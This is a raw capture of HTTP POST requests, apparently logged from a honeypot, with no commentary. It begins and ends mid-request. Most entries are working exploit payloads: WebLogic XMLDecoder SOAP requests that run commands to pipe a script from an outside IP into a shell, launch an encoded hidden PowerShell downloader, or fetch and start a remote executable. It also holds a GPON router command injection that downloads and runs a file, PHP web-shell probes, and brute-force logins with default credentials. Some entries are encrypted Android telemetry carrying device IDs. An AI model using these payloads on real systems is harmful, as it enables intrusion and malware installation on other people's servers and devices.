Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST http://p-behacdn.ksmobile.net/cu HTTP/1.1
Accept-Encoding: gzip
Charset: UTF-8
Content-Type: multipart/form-data; boundary=----------------------------7d92221b604bc
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: p-behacdn.ksmobile.net
Connection: Keep-Alive
Content-Length: 72

H°º(œ
ÍÕ`i+nC\KlE^Sz]#[@^zZr^kZ&=0OoBcékV∏iRËc^<»cGcrjChC*YÈZ&>0N

POST /admin-console/login.seam HTTP/1.1
Host: x.x.x.x:8080
Accept-Encoding: identity
Content-Length: 123
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0

login_form=login_form&login_form%3Aname=admin&login_form%3Apassword=admin&login_form%3Asubmit=Login&javax.faces.ViewState= 

POST http://cm.adkmob.com/getCatalog/?android_id=6ccc52a8048214f&cver=51424845&mcc=510&model=MI+4LTE&brand=Xiaomi&os_version=19&lan=in&country=id&ch=2010002546&resolution=1920x1080&net=2&k=1 HTTP/1.1
Content-Length: 896
Host: cm.adkmob.com
Connection: Keep-Alive

Äë,_—úãd®3OÎ¥î(µ·K'7KÎô»á5ˇ
µ∑Ùè3∞Ur‚Ì*f)|J]íè°ÑÔeEâù–{Í#Á˝‚à…‘¢—˛'ÅûˇI£ï∂°|_ph«6f—++u=¶ÜóU6Q"kksû'
WΩ‡ƒ÷TNª¥y‘ƒ⁄ä:*n≥”“·˜wÂ+Êâúl.Çû›Ø$∫äÍxï¶˝ç5OD¡+NéFcÈ^W•ì_s(wFUÔÈẔÌöÿ1õ ˝äY∞zY"©aqŒ…¢,”W⁄K)	H0E}⁄{gûUHN
a(K›;7´êÿêgøy]uRÓÌ~{ÆV„ÇœgD"ãŸÛi®…ıfl7¿≥üú=—˝¥Á:ù6I†˝°ZâªÄÉM‚_néÈû°¶ï¢
ß•÷566œBa)]Ûˆ¢◊’+†un≤-V_	p¸Ò܆åü†OåKAÖmU°[ÚKn…x]C†Ï¿D&"÷5™ãIXwd≥‰´∏›‚{]ÜêÔµ€1Y“˝»x=Ò;µôÏ≠çÌUf¶ûâ&◊c™ãiÒˇ”ÜÿÉ:)üϣãî∑3]ñ]∆◊´Æ˘@*
Ì‹#>ÉaÍCŒ£8Hfª∫/Ó31ƒ™I
∑d3Õ¡?;±ä“âò—·„Fªw)˚¥nî·>kÄ∑
s‰Ca@¥ù/´\&]T3Ò?'√E^Ñ	àk∆5√&q•˛©+@VË_ˆ†
˜ªÛ¬4‰˝\˛
ä
)¢¬`´"ˆ_Õ_ıáo]ʶ∂«≤¨ËH8Ÿ^x ÒÂ䃆êëûN!z†
wh0od<(gD-ϧ›⁄¬úâõaÙ)ø’jDxÂÍq|uõ [_˚
ü:±,Ü“∑Ìfi9Ï.ÉÃ,«!¬Æç˚è kyUQÛ^OÅ–^¨ÔWµPFëÜı“Œ/L©|]H∂”*ªÏñÙ˝·nm}Î6¶o,©àó≤ÊJØ~lA_å√	-∆¥flµAÎBª/◊}QD)∞˜íÛfl◊Y_ÌÊ9’6Æj-“Õt®ÆÔ‹*4¬>Úl
St:Ò◊WÙ´Ÿ9ãé“5„L∞‡œ<éYäÚåµ6à%‘û
ÌπyÅS‘K©77_P,cP.¿6rT≥ì¥ò˛ÁG:Qs≠À¡µY‘ªîA˚†ÔzÙi÷ú’¥#eñC

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1187

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
  <array class="java.lang.String" length="3">
    <void index="0">
      <string>cmd.exe</string>
    </void>
    <void index="1">
      <string>/c</string>
    </void>
    <void index="2">
      <string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACAAJABPAFMAIgA7AEkARQBYACAAJABXAEMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwADEALgAyADAAMAAuADQANQAuADcAOAAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
    </void>
  </array>
    <void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>


POST /wls-wsat/ParticipantPortType HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 1306
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> 
   <soapenv:Header>        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> 
           <java version="1.8.0_151" class="java.beans.XMLDecoder"> 
               <void class="java.lang.ProcessBuilder"> 
                  <array class="java.lang.String" length="3">                      <void index = "0">                                                 <string>cmd</string>                                       </void>                                                          <void index = "1">                                                 <string>/c</string>                                        </void>                                                          <void index = "2">                       <string>cmd.exe /c PowerShell (New-Object System.Net.WebClient).DownloadFile(&apos;http://198.50.179.109:8020/taskhostxz.exe&apos;,&apos;C:/Windows/temp/taskhostxz.exe&apos;);Start-Process &apos;C:/Windows/temp/taskhostxz.exe&apos;</string>                      </void>                                                      </array>                  <void method="start"/>                  </void>            </java>        </work:WorkContext>   </soapenv:Header>   <soapenv:Body/></soapenv:Envelope>

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST http://profile.adkmob.com/ud/ HTTP/1.1
Content-Length: 230
Content-Type: text/plain; charset=ISO-8859-1
Host: profile.adkmob.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI 4LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36

v=16&ac=50&pos=34100&mid=104&lan=in_ID&ext=&cmver=51424845&mcc=510&mnc=10&pl=2&channelid=2010002546&lp=0&gaid=8776479c-11a4-48e7-8a70-96e640a29187&aid=6ccc52a8048214f&attach=[{"res":0,"pkg":"com.screensaver.ad","des":"","sug":-1}]

POST /xw.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 23

h=die('Hello, Peppa!');

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /wuwu11.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 45

h=die('Hello, Peppa!'.(string)(111111111*9));

POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 26
Cache-Control: no-cache

log=jamesatchue&pwd=141414

POST /GponForm/diag_Form?images/ HTTP/1.1
Host: x.x.x.x:8080
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Hello, World
Content-Length: 118

XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=;wget+http://185.62.190.191/r+-O+->/tmp/r;sh+/tmp/r&ipv=0



POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
l÷yyÃ≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·
∞îìD!Y›∆√«∆fl

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 364
Cache-Control: no-cache

QKRax97AbBRsWuOe4FWMVsBj6asWTPHjJrBDvDF9YkyywBo8OaEJmWsPlt5LLJPj80ewP14OIiiIfiWXf2YgptBCfOPHZYEBX3ZN75p42cDi6P1abw3UJV7IjrASirWc+FGuTaUJBD6d83cgVbvnImXJG22p+8fT7XeDHY4GD8vSuLwKyrOuaG89Wxwbkp/FK9CPsBLNxuYIoHsuQYUNHSbfmMwSvpi9yvh0t2n5BtaLqYsbVgTeOzc6WxX7hjFdvZZGJIf70HS298ofE0Gyc7J/2UpdRbbfG0tU/88bB8WdLy4p+iUaoMcL1w9bSYwYkGYOI057Gg9dwOLu05sh5tAhHbFc/gRPJtO2ss7xyw==

POST http://batsavcdn.ksmobile.net/bsi HTTP/1.1
Connection: close
User-Agent: CMTalkerSDK.0.0.1
Content-Type: multipart/form-data; boundary=3i2ndDfv2rTHiSisAbouNdArYfORhtTPEefj3q2f
Accept-Language: in_ID
Host: batsavcdn.ksmobile.net
Accept-Encoding: gzip
Transfer-Encoding: chunked

3f9
7›`v
w€|`9dAVp
Mo)M\WRexTP$fnax]Huíbu(
aJLZgj-: wR"5=dWHmS?\_TT>WVW_f|CB+
M?(\A1TLMZ(jO]PYc|#\_PMoqG]VZchQZY@qjNYHe*6TLk*BTRc+MViBP]VK;}]RSue
BrDXQIo.X^3-MQb^M>D]Q	5+eAQLT&jNY[be
Dr^^VOnyE\OH''
rG	O3,
y?M\4M	CT=WVTR`qrWDTPIhzL^R_g}fRYU@edWAPupP6YSj~L
T6|eSMd,F^P_ck \LM<}Yg{KS`YYL>}T[[ayM5GTZCq3WAPne
DrWXMZ-&WVA	8$D9V

V?)5(D^rDCBldWAPfxiW[QLkxCTW\n~rGDTChqDTRX6zgW\?@
e/SaWYZqjNYH2~fSKeqA]_dqM2BZPOo|^_u4IrKDTPT>WVRZepcJLrWy.G]7H@9:D0$[|L[MiC^[Fu:
aS\XJl}EXUZaqh^BCrWUW1pLb@QXXj-YR_bNSb_
RJn}ANOH'k6RLezDY_3|6Ze~E
W]c{rYJCrG@AusaT\SIqjAPu*G_~B
2'B4(
rQDTPHnxE[OH$kaTWSIhxAZS\o}hJLZgjB[Q[4-eTnqbI1_RHl)W@Aus
P5Vl,UX5|Qi@UWX?xZSXfq-LZgzYNHmxdDZgjD5+E|L[ImYNHmxbT_THi~EZ[^`}
|L[Z>~B_R6|Nb[>}\P\2,eW
dWAPu{gA8,LTWR4xhQXPd~DZR2kU+	L[Iq
13e
jNYXgxfP^QT8NYH4&E=MO3)4:
rQDTQT;WVR[b{aVZWHkpA[WXce
QrD]PAlpAUU[dyQhAop\fzJbLMZ-jONV^3+iBVWUJi+
\n/T2U[Q<|MA{2
]r^BCrD\[Zf|CB+
M	;,I\=E
s;>=Q|L[Je}ETTS{k[jW[SAoy@\W\gg^VMZ>jON
_fPeT[N>)
P1,
gVUjz@^AFu9
rUYLl-G
Y3/MWe_Q8{E\Z[4+`3
0



POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
«™›^Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îVJY›∆√«∆fl

POST /sheep.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 44

m=die('Hello, Peppa!'.(string)(111111111*9))

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
ΩÉû/Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î”˚Y›∆√«∆fl

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /getcfg.php HTTP/1.1
Accept: */*
Cookie: uid=Zd5iHiPget
Host: x.x.x.x
Content-Type: application/x-www-form-urlencoded
User-Agent: Wget(linux)
Content-Length: 60

A=A%0a_POST_SERVICES%3dDEVICE.ACCOUNT%0aAUTHORIZED_GROUP%3d1

POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1019
Content-Type: multipart/form-data; boundary=54Wp6oWTng13p1jwpC8_PfFPP_wniO
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive

--54Wp6oWTng13p1jwpC8_PfFPP_wniO
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

1
--54Wp6oWTng13p1jwpC8_PfFPP_wniO
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

233051
--54Wp6oWTng13p1jwpC8_PfFPP_wniO
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

f646a743e2b410e31b71046091a50c15
--54Wp6oWTng13p1jwpC8_PfFPP_wniO
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

0
--54Wp6oWTng13p1jwpC8_PfFPP_wniO
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

{"module":"searchengine","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"39","language":"in_ID","channel":"2010002546"}
--54Wp6oWTng13p1jwpC8_PfFPP_wniO--


POST http://oc.umeng.com/v2/get_update_time HTTP/1.1
Content-Encoding: deflate
Content-Length: 64
Host: oc.umeng.com
Connection: Keep-Alive
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)

xú´VJ,(»N≠T≤R254OµL2O35321H24µH10HL33S“Q*K-*ŒÃœãOŒOI™42T™ÁJ»

POST http://android.bugly.qq.com/rqd/async HTTP/1.1
wup_version: 3.0
cmd: 840
strategylastUpdateTime: 1490687517000
appVer: 18
prodId: e4696cbcd6
bundleId: com.differencetenderwhite.skirt
secureSessionId: 733247b121cb465c82e1f65970c22331_SZ
sdkVer: 2.2.2
platformId: 1
A37: HSPA%2B
A38: HSPA%2B
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: android.bugly.qq.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Type: application/x-www-form-urlencoded
Content-Length: 1384

&"¬D„ˇ≈Ö≤Zl$“ir…=wqö›#ÔÄÑ4W^éx™;H;‡LäÁ∞i˝ˆL!0â‹ŸèQA† J˚4I:%ªk≈>ÿÚˇò†d"ˇRO†eÌ**˚ wÄ3Â	ízúä.aàŸhVòNM_QºÁ˛êÅçñ¸}AGfl2≈b¶M1á,»≥[¿ÙìEW`†_z<Ôƒ_"0†_P0∆ˆê5p=sUD*HË„	;fsuß&¢é\û4™ûƒDÔÎ)E8/˜tŸí«D_Dº¿ÜâRíÆòp´{n(õ«fl[(f∞ÌùJîˆFÏ∂)ê≥√GÌ˚…É+yTEÉF·QQ‡¬0 ]L∞ÄÀÔ0í–¡eæºÜí^√kŒ¡∞(ôT∆±‰˜ˇÿÓÁ#
jßXo]Ü«ªn˚[Vi_qÕ≈d‹e˘rèÆtLÆ¥iû™ãlz ˜‘ìÌ}‘}ùÊ‘$pâ©)Hµj¶WT˘!ÈœX}&˜…≤nåÜ…=—w≥—«¿˝<Ňêÿ∫í·⁄ñJÇîıV:gn6¬ŒÂ˚{J-L.Üäá˙N∑'cœ?≥ÒnÅ^~Z€I≤ùËéfiHyeâ∆√*íÌõ‡ó›≥[^”û27¡ÂvÿõU‚slx«ûTºdêí.x’nÀé!B´ÒÒ™Ö[å߉™ò.“Âfi˘":–Í≠c`€∆BŒmfÓ⁄å@k*›˝ó‹>Âö3ãôlfÍiï,ß6”Ö∆Éá√2ñïÑécT
$≈'bÆbmÇô˘|Ÿ≤ˆ†é“ôd˝3z≤’ÕĢãJZvÑ6¨V©⁄ñ‘Z*mëï4~}ÈkËπàß^&ñ¶Êû˘âaHæ€â° vWx_¶ a≠Œ›Óõ¯=®û—ÑRAø°¢*>˝õW]ŸAÎ∂”ŒNÒ}–rs|ú˝∆#≥˚„\€Gö†ëÔÍAy„%∂›®HÁb»Æ‘Œ"_©R<ï»d.≥–˝ΩÁæêÂìÀ¡h*/E^*¡Nbĺe˜Ω,¿¶†ÌıQNôèå·Ü«¶⁄ºœã√N›Õ˝ZgŸ≈+NìQkVBEÿåfqH¥LDÕŒé≈DO/°G)oIÄÓ⁄&dÆ>EúfºµÊ’bDÒúˇ¶LEÕ'T@M¶!‹˘‹$Yñùû
v°œ•‚bò¶Iz{ëø⁄æı&¨dû´´D≥Æıî¸õ—zùpYî_‘Ê[-¥e s~∆Ò+´$ÕJ”Ñ˛
D≠8.¬…‡ı¨ôŸSfÊ€∞¶k™y‡TFT
åÎÕv…<\ÆmÆ≥—∫Á∂Cñò"Ø"íƒw©q¬ÎÇØ∂Bé92WΩ˝ÄÊj‡î™üÄì[ó”Ô3Æ!Ë0±nº∫fTk7Ö‘™©jˆæ-zË“#æGà°a<åô?k3¢Ádög
¢Ä‰Ç_‹Â¥I$Ω‹becæ›ÍS•åc”93≠¨‹æœ:YR(ŒÁÆ5ˆœ»˙Œat±'©`'¡Ù,9,NXÍÿö¯ãÊ¿
∞ND|Ø[fl»Ì¯-M—]©6ÍÛî6sûY5ö<ÙbœYÙ]¢µ¿QÊ7ÛÍÕµ?√	pS§ÛU£o¡úº>gRΩ÷ÕªcâW[–˙p_˙‚!÷øfÏB˚ˇh,uúΩÛw^≤Sêh}*½ø%ÇT£Ã¶ÃSF´S&ˆtc@äπ’‰¿ml≈x'ûÔê:^sL∫îóî˙ï|à¯\ˆJ|âéíö®∑l!Ñ Y†5y∏<"'µYzÉÊ}≠V?ejgΩñüZ\±Œñüd_']∞`Ë–L∫‘˚R)

POST http://alog.umengcloud.com/app_logs HTTP/1.1
X-Umeng-UTC: 1496056910822
X-Umeng-Sdk: Android/6.0.9 Block+Puzzle+Jewel%2F18+MI+4LTE%2F4.4.4+51CDA60BD75DD94418ADE9CC4CEEE046
Msg-Type: envelope/json
Content-Type: envelope/json
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: alog.umengcloud.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 2427



POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
%ÑlhÃ≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î¯+Y›∆√«∆fl

POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 21
Cache-Control: no-cache

log=admin&pwd=8888888

POST http://check.proxyradar.com/azenv.php?auth=149412004803&a=PSCMN&i=1082784101&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close

testPost=true



POST /wls-wsat/ParticipantPortType HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 2471
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> 
   <soapenv:Header>        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> 
           <java version="1.8.0_151" class="java.beans.XMLDecoder"> 
               <void class="java.lang.ProcessBuilder"> 
                  <array class="java.lang.String" length="3">                      <void index = "0">                                                 <string>cmd</string>                                       </void>                                                          <void index = "1">                                                 <string>/c</string>                                        </void>                                                          <void index = "2">                       <string>cmd.exe /c &quot;echo Set objXMLHTTP=CreateObject(&quot;MSXML2.XMLHTTP&quot;)&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objXMLHTTP.open &quot;GET&quot;,&quot;http://198.50.179.109:8020/taskhostxz.exe&quot;,false&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objXMLHTTP.send()&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo If objXMLHTTP.Status=200 Then&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objADOStream=CreateObject(&quot;ADODB.Stream&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Open&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Type=1 &gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Write objXMLHTTP.ResponseBody&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Position=0 &gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.SaveToFile &quot;C:/Windows/temp/taskhostxz.exe&quot;&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Close&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objADOStream=Nothing&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo End if&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objXMLHTTP=Nothing&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set 